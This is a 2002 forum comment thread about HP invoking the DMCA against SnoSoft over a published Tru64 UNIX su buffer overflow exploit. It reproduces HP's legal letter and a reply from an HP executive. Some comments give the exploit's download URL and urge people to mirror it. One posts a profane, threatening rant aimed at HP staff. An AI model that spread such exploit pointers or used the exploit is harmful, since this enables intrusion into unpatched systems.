The DMCA made many things that were legal and ethical illegal, like posting research done on a product is illegal now, reverse engineering which is needed for compatibility purposes is now illegal, this is corporate bullshit, it is time to challenge these nonsense laws, the problem is that the legal process to challenge a law is very costly and it is out of reach for most of us.
So I guess one way around the bad laws, is using the good laws against it, for example getting organized and having lists of countries that enforce the DMCA, and the ones that do not.
I am planning on putting up a website in Mexico to avoid problems with the DMCA, since right now even if I am correct on an issue, if a large corporate industry were to sue me for whatever reason, I would be destroyed due to the expenses involved in the defense process.
Let me rephrase that, if any one of us were to be sued for whatever reasons by a large corporation, we would be destroyed, even if we were to win a case, the financial cost alone would be huge.
What is really bad about this is that in the US it takes nothing to be sued (meaning you do not really have to do anything bad at all), reading the articles on newsgroups, slashdot, and other places. For example a russian programmer (Dmitry) was arrested for writing code in Russia, in the USA, even though the code was legal in Russia, in other words the DMCA is going to be pushed beyond borders even in countries that do not support the DMCA, this is unacceptable.
In the case of HP, the person that found the bug did HP a favor, since it gave HP a chance to fix the bug, and HP saves money on debugging the OS since it is done for free; someone that wanted to do harm would use the exploit, and post it in a cracker newsgroup anonymously. But HP instead of saying thanks, threatens this person with a lawsuit. This is completely insane for a technology company.
www.consultorlinux.com
linux consultant since 1992
Could be, I agree, but I'd read that as 'full disclosure unless you'd hired us to perform a private audit', which is rather more reasonable.
Greg
(Inside a nuclear plant)
Aaaarrrggh! Run! The canary has mutated!
By doing this HP has just made sure that anyone that finds a real security flaw in their operating system will not publicise the issue. This security through obscurity has been shown to be useless... Even Microsoft now realizes this.
If the item is not fixed when it is first found, and made public then this means that those flaws can easily stay hidden, and propagate into other subsystems in such a way that fixing it at a later date may become impossible.
If the problem is not made public, there is a very good chance that real "black hat" underground distributors of the information may have and use the exploits. This could mean that real system admins are kept in the dark while their boxen are rooted from under them. This is because the admins are not made aware of the issues as a result of this action by HP.
As a result, I would be much less willing to use/trust a Tru64 / HP/CPQ machine since I have no idea if there are security problems that HP hindered from getting fixed.
--
Time is on my side
Ah.. but once they say "it is only a theoretical vulnerability" the person that published the info can say... "Nope: here is the code"; or even better, can say in the initial publication "here is the description... and we have working code; which will be published in 14 days from now" and send the vendor the working code...
Even Microsoft has learned its lesson... (there is still space for improvement... but they are getting better in these situations)
--
Time is on my side
Well, it's around 4 AM, or earlier, in the States right now. I wonder how much sleep the HP execs are getting :)
Trying to dictate when someone is allowed to say something is in violation of the first amendment. If you live in a country where that doesn't apply then I guess it sucks to live there.
The real solution is for the vendors themselves to be more proactive and actually search for bugs and vulnerabilities. This isn't a perfect solution, because there is no such thing. Until such time that software is mathematically perfect there will always be bugs (in other words there will always be bugs). What companies like HP need are teams of programmers and legitimate crackers whose job it is to thrash the code as hard as possible to expose vulnerabilities before the criminal crackers find it. If they're too cheap to do this then fuck them and the horse they rode in on.
If you REALLY want to put an end to crap like the DMCA the very best things you can do are vote and donate money to groups like the EFF and ACLU. Put your money where your mouth is.
Lee
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
An official statement from the Phreaking.org crew (PoC) for HP:
"All you motherfuckers are gonna pay, You are the ones who are the ball-lickers. We're gonna fuck your mothers while you watch and cry like little bitches. Once we get to Palo Alto and find those HP fucks who are making that ruckus, we're gonna make 'em eat our shit, then shit out our shit, then eat their shit which is made up of our shit that we made 'em eat. Then you're all fucking next."
su.c is mirrored at phreaking.org - We would like to encourage everyone outside of the US to host and link to phased's exploit.
US Feds and Compaq-HP force Google and other large spiders to remove code!!!!
:
:)
If you try diligently, the half a million dollar source code secret (which was binary at first) and has three derivative versions, was DELETED FROM GOOGLE CACHE!!!!!
I dare you to find any left of the original in Google! I tried every reasonable length substring.
The info to search for in google is
"
got fed up of corporate bullshit
here is the warez, nothing special, but it does the job
note, this is just one of many many exploitable bofs in tru64 5.x
http://deepmagic.securify.org.uk:8080/su.c
phased
phased@mail
"
good luck!
if you try to find source code you will fail too.
the substring +"su by phased" yields NOTHING on google now as of 7:46 EST 2002 07 31
Phreaking.org is taking a stand though.
osama bomb kill alpha 66 chelsea quell cuba mt weather raul castro allah africa liberation omega 7 cia nsa dia
sanford and son slashdot missle fox news carly terror muslim pope gun clinton deez nuts toyota rabin arafat abu nidal
Surely, if anyone in the US has anything like this that they want to make public, they can find someone outside the country to post it for them ? Or, of course, post it yourself via some external (to the US) media.
I read that the guy who posted the exploit is a non-American and says that he's not worried about the DMCA and HP's action because it doesn't apply to him. And, of course, he's absolutely right !
The same applies to any American who wants to publish some code that includes some patent or other - just publish it from outside the US - it's not difficult. I think this is how the encryption module was distributed for Linux (don't know if it still is because the patent has now expired, I think ).
The point is that yes, the DMCA is awful, but getting round it is child's play if only you look outside the box !
There are not that many Tru64 boxes laying around. Good thing that this place lets you sign up for shell accounts where you can test drive your programs.
i didn't mean to start a whole US -:- EU : polemic, just stating that some laws in the states (DMCA is but one of them) have been bought by large companies. And that's wrong!
The first amendment wasn't written in this or even the last century, but in completely different times.
Some of these practices probably also happen overhere, we're no less capitalistic.
Though most US readers probably think the EU is one federal country with a centralised administration. This is of course not so.
Every member state is constantly wary of supranational legislation infringing on national liberties.
We value our freedoms just as much as every other ordinary western citizen.
We don't ADORE the EU, but it tries to bring countries together.
BTW: a UK judge just declared an anti-terrorism law illegal! I think there's hope yet.
-- Try getting on iVillage in S. Arabia?
-- "We can the bomb the world to pieces, but we can't bomb it into peace!" - Michael Franti
The Awful Truth
I can only assume that most readers on /. work in the computer industry. I make my living in computer security. If this is HP/Compaq's stance, then every report I make will recommend avoiding their products. It is just that simple. Collectively, we have a large voice, we just need to take actions instead of debating.
We have removed HP from our vendor list until HP changes their position. We hope other companies will follow suit. If you do, make sure you notify them of the fact.
Ask me about my vow of silence!
Now I finally understand WHY it is that HP thinks they can sue. I was honestly baffled.
Lasers Controlled Games!
Only criminal hackers will have exploits!!
'Good one!'
The problem with slashdot is that most of its users were bullied and stuffed into lockers as kids!
In an internal email (which I am hesitant to directly quote in full), Kent Ferson said that this article was published w/o contacting HP to confirm/deny facts. He assures us that "the primary facts of the article are wrong".
Also note that the merger is only a few months old at this point. This is basically a Compaq response from the Tru64 management team, and hopefully will not tarnish HP's reputation when it comes to HP-UX and Linux. I would believe that "old HP", and the new HP a year or so down the road, would handle this much differently.
Europe is largely socialist, this American can see the difference between socialism and communism. I for one don't like high government spending, so I don't prefer socialism.
I am also not in constant fear of being shot. That comment is so absurd and obviously lacking in personal experience and insight. If I bring up all of the wars in Europe, is state sponsored gun-toting somehow better?
I think my point of view on guns is directly related to my point of view on socialism, personal choice is better than government mandate.
Please refrain from generalist statements that only further ignorance.
You know, in many ways, you're right. In so very many ways, the original poster is also right.
There are companies out there that don't worry about things like increasing shareholder wealth- many of those are privately held companies. There are also a lot of companies that seem to be much more concerned with the short-term stock market valuations, etc. and will do anything to "improve" their valuations short-term, including mass-layoffs, cooking the books, screwing the people of an entire state over to make their bottom line look better, etc. While it's not 100% true, there IS a reason why a lot of people think that companies solely exist to increase shareholder wealth.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
Well at least you get an answer if you write to him (could be an automatic reply though because his mailbox has been spammed by the /. crowd ;)
...
--- schnipp ---
Dirk,
Appreciate your note and concern. Let me just start by saying, "don't
believe everything you read in the press :-)". I can assure you that my
primary interest and concern is for the Tru64 customers and that the
Tru64 engineering team is committed to finding and fixing any security
problem in the product and getting these fixes/notifications out to
customers ASAP. Trying to do everything possible for Tru64
customers is what motivates and brings me to work every day
(and night :-). We also encourage our customers and 3rd parties
that find security issues in the product to coordinate through the
CERT process, which has been set up to support both product
vendors and customers. Again, I appreciate your concern and
feedback.
Kent
-----Original Message-----
From: Dirk Lenneffer [mailto:*********.com]
Sent: Tuesday, July 30, 2002 11:42 PM
To: Ferson, Kent
Subject: TRUE64 exploit
dear mr. ferson,
instead of threatening the people who do YOUR work of finding bugs in
your product you should simply thank them, fix the bug and move along.
this last act of yours doesn't give us as customers great confidence in
your way of handling security related issues within your products.
best regards
--- schnapp ---
___________ LOAD"$",8,1
I'm glad HP is making all this noise. We've been discussing whether to purchase additional Sun boxes or consider some of HP's products. Now we know how HP operates. My supervisor has swung towards Sun. Thanks for the saber rattling HP. Sun may not be perfect but at least I know what their problems are and CAN DO something about it.
Has Comcast disconnected your Internet account? Same here. You can read about it at http://comcastissue.blogspot.com
Right now we're at the flaming torches stage. Pitchforks and scythes aren't too far off. Better have Igor stack a few more chairs against the lab door.
--
E_NOSIG
"That public disclosure drew the ire of Kent Ferson, a vice president in HP's Unix systems unit, who alleged in his letter on Monday that the post violated the DMCA and the Computer Fraud and Abuse Act."
HP / Bruce - the answer is obvious - you got too many VPs and not enough programmers. Fire Kent Ferson and hire me - at his salary.
world was created 5 seconds before this post as it is.
The EFF I respect. I understand their issues, and the fact that we are totally under assault by corporations who want to chop up the digital world and sell it to us at as much as we can possibly afford to pay. Digital "Coal Towns" (look it up if you want to see some of America's greatest corporate crimes against humanity in the past).
/. crowd, I'd like to say lets stick to what we are specifically interested with on this board... and not give money to people who would love to "engineer through legislation" a power struggle at the expense of some Americans over other Americans.
As a member of the media, and a person that touches base with the ACLU every few weeks, I'll say that the ACLU is no longer interested in civil liberties, but more interested in legislating this society to a direction that they would prefer us to act. Trying to modify behavior through legislation is very different than protecting the right for us to act the way WE WANT TO ACT.
As of late, they seem to be only interested in anyone else but a person interested in computers. After talking with me several times face to face, the local rep of the ACLU has pretty much explained about their crusade against private Christian schools (please note the stressing of private) and their deemed "objectionable behavior" by those schools, and active interest in what goes on inside those schools. Those activities are rather curious for an organization like the ACLU, are they not?
After talking to them about these subjects, I would never, EVER give them another dollar. They appear to represent the civil liberties of only SOME AMERICANS. OF COURSE, before I get slapped back, I would like to repeat this... imho, IMHO, IMHO!
So as a member in good standing of the
This is a call to not listen to the ACLU. For computer issues, please stick your money to the EFF. The ACLU has gotten batty in its old age, and is trying to change the way we think, which the last time I checked, is a CIVIL LIBERTY.
Firestone tires on Explorers only affect the safety of the occupants of the vehicle, and isn't something other people can exploit. This HP situation is more analogous to publishing that the key locks and ignitions on all Explorers can be easily defeated with a safety pin.
Even this isn't a perfect analogy as the logistics of recalling & fixing all Explorers is far more complicated than making & distributing a software patch, and hence the problem may be in circulation for longer, but it's closer.
Not that I'm defending HP's actions -- they are now officially on my sh*t list. And not just because of the Absolutely Bogus Windows Printer Driver bug/easter egg...
as commented by dillon_rinker
The DMCA, among other things, can make it a crime to announce vulnerabilities in security code and devices [using free speech](if those are intended to protect copyright). Ergo, the DMCA is unconstitutional.
Perhaps HP is aware of this issue and is trying to press it in a manner that the DMCA can be declared unconstitutional and removed?
Sticks and Stones may break my bones, but copyright will always protect me.
This is what I wrote to the ACLU. Maybe they'll notice. Personally, all of this is scaring the crap out of me.. The ramifications..
- - - - - -
A new violation of free speech by the DMCA:
You may have seen this already. Hewlett Packard is threatening to sue a computer security expert to *not* reveal a security flaw in their Tru64 operating system.
http://news.com.com/2100-1023-947325.html
Plainly put, I feel this is outrageous! HP knew of this flaw for over a year, and did nothing to prevent it!
As we become more dependent upon computers, it's not inconceivable that this flaw could be exploited to harm more than just data- if critical systems are controlled by a computer running this operating system (such as a power plant or a train switching system), a security exploit could mean the safety of human lives!
for more expert perspectives on this matter, please review the comments on this site:
http://slashdot.org/articles/02/07/31/0030239.sht
Thank you for your time. I hope this is not lost in the sea of emails you receive..
Yeah, I realized that after I looked at the preview on /. Oh well, hopefully she'll understand.
(B) + (D) + (B) + (D) = (K) + (&)
I never thought I'd see the day when I could put DMCA, Coward, Arrogant, and HP in one sentence.
So here goes: Who is the Arrogant Coward at HP that played the DMCA card?
I feel dirty for typing it.
if there is a p2p application that is difficult to DoS, and if RIAA circumvents that by reverse engineering... can they be sued as well?
Earlier this afternoon...
The Feds have raided an iMac convention, where they have taken over 3 dozen people into custody for having tools that "violate" DMCA policy. (i.e. Felt markers)
July 29, 2002
By Electronic and Certified Mail
Adriel T. Desautels
Secure Network Operations, Inc.
D/B/A SnoSoft
5 Oak Ridge Drive, Apt. # 2
Maynard, MA 01754
Re: Tru64 UNIX Buffer Overflow Exploit
Dear Mr. Desautels:
It has been brought to my attention that, on July 18, 2002, a buffer overflow exploit of Tru64 UNIX was posted on securityfocus.com under the alias phased@webtribe.net (a/k/a "phased", phased@mail.ru" and "James Green"). Based on information provided by Gil Novak to HP concerning aliases utilized by SnoSoft, we understand that this action was taken by an agent of SnoSoft despite SnoSoft's representations that it intended to comply with the industry standard practice of reporting its findings to CERT and despite the ongoing discussions between Gil Novak and Rich Boren on this issue.
Please be advised that the posting of the buffer overflow exploit has exposed SnoSoft and its members to potential federal criminal liability under both the Digital Millennium Copyright Act ("DMCA") and the Computer Fraud and Abuse Act. Under the DMCA, SnoSoft and its members could be fined up to $500,000 and imprisoned for up to five years for "offering to the public . . . any technology . . . that is primarily designed or produced for the purpose of circumventing protection afforded by a technological measure that effectively protects a right of a copyright owner." See 17 U.S.C. 1201(b). In addition, under the Computer Fraud and Abuse Act, if anyone uses the buffer overflow exploit posted by SnoSoft on securityfocus.com to cause damage to a Tru64 UNIX system, SnoSoft and its members could be subject to significant criminal sanctions, including up to ten years in prison. See 18 U.S.C. 1030(c)(3) & (4). Finally, SnoSoft and its members may face additional penalties under various criminal statutes of the Commonwealth of Massachusetts including, but not limited to, criminal extortion (M.G.L. c. 265 25).
HP hereby requests that you cooperate with us to remove the buffer overflow exploit from securityfocus.com and to take all steps necessary to prevent the further dissemination by SnoSoft and its agents of this and similar exploits of Tru64 UNIX. If SnoSoft and its members fail to cooperate with HP, then this will be considered further evidence of SnoSoft's bad faith. Finally, HP also reserves its right to seek whatever legal recourse it has against SnoSoft and its members for monies and damages caused by the posting and any use of the buffer overflow exploit.
Regards,
Kent Ferson
cc: Gil Novak
bcc: David Cardos
Rich Boren
autoreply
Thanks, HP, you evil fscks. I will now personally never buy another product you make EVER.
Carly can kiss my lily white ass, bitch.
Today, top company executives seem to be above the law.
The HP VP droid who did this is not acting above the law. He is using the law exactly as intended!
We need to get the law removed, not convince a bunch of corporations that they shouldn't use it!
-pmb
The founders of Secure Network Operations would like to thank all of you for your support in this issue. We will soon be providing you with updates to this issue on our web site. Thanks Again!! Regards, Snosoft Recon Team & The Cerebrum Project
http://www.msnbc.com/news/788216.asp?0dm=T14JT ....this just keeps getting better and better! --Snosoft
HP attempts to use DMCA against security researchers UPDATED: 2002-07-31 19:45 ET
This contains some new information from Kevin..
It's not clear from the article whether or not the hackers gave HP any prior warning before posting the exploit. If not, posting the exploit was irresponsible, and they should be prosecuted. I don't think the DMCA applies, however, since it's designed to prevent cracking copyrighted material. I don't see how hacking into a computer violates any copyrights.
Vote for Pedro
Another New HP "Invent"ion -- how to make money off of their own defects.
Goes right along with "Invent"ing ways to outsource and downsize.....
-- Ex HP Employee, from the HP Way days...
This idea was invented by Shampoo.
Intent is always a factor in any criminal or legal proceeding. Intent is very important in deciding a case, because intent determines the purpose for the act in question, rather than the result.
Considering only the ends means you ignore the means, and the means may in fact be unconscionable, or even reprehensible.
The indirectness of the gain is immaterial to the fact that the motivation was gain.
Gain is not a *bad* reason, but it's not a reason which renders the act defensible, from a legal or moral standpoint.
Motivation speaks to ethicality of the action. If the motivation was base, then that's very different than if it had been principled.
-- Terry
http://www.siliconvalley.com/mld/siliconvalley/3774570.htm
Power without responsibility == tyranny, however you slice it.
--
When you go out of your way to call you, from Denmark no less, you do what everyone I talk to does ... "well, I haven't had time to take a shower today, and I want to do that" ...
... ;-)
Maybe it's just me
We do not live in the 21st century. We live in the 20 second century.
bleh... hit submit instead of preview.
anyway, as I was saying:
The fact that they are threatening legal action implies two things: They see this as a real threat; they prefer to suppress word of vulnerabilities rather than fix them.
The latter is not the sort of response I want from a vendor. It's especially grating when, in the past few days, Debian and RedHat, for instance, have responded promptly to every issue posted on BugTraq.